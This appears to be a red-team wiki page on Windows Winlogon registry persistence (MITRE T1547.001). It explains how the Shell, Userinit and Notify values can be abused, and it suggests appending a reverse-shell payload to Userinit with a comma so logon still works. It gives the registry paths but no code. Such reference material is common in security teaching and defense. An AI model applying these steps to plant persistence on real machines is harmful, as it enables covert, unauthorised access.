Winlogon Persistence
MITRE ATT&CK™ Boot or Logon Autostart Execution: Winlogon Helper DLL - Technique T1547.001
Theory
Winlogon is a critical Windows component responsible for handling user logins, loading user profiles, and managing session behaviors post-authentication. Attackers can abuse Winlogon registry keys to establish persistence by configuring malicious executables or DLLs to execute during the login process.
Registry Keys & Their Behaviors:
The following keys can be modified for persistence:
Shell– Specifies the user shell (default:explorer.exe). Replacing this value with a malicious executable ensures it is launched instead of (or alongside) Explorer.Userinit– Defines the path ofuserinit.exe, which is responsible for setting up the user environment after login. Adding a malicious binary here ensures execution before the user's desktop loads.Notify– Points to a DLL that is loaded into Winlogon’s process for handling session-related events (e.g., lock, unlock, login, logout). A malicious DLL here will be loaded bywinlogon.exe, often running with SYSTEM privileges.
Practice
Registry entries under HKU/HKCU will only apply to the user.
Registry entries under HKLM will apply to everyone
If we'd replace any of the executables with some reverse shell, we would break the logon sequence, which isn't desired. Interestingly, you can append commands separated by a comma, and Winlogon will process them all.
We may edit the Userinit key to make our payload executed during Windows logon
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Resources
Last updated
Was this helpful?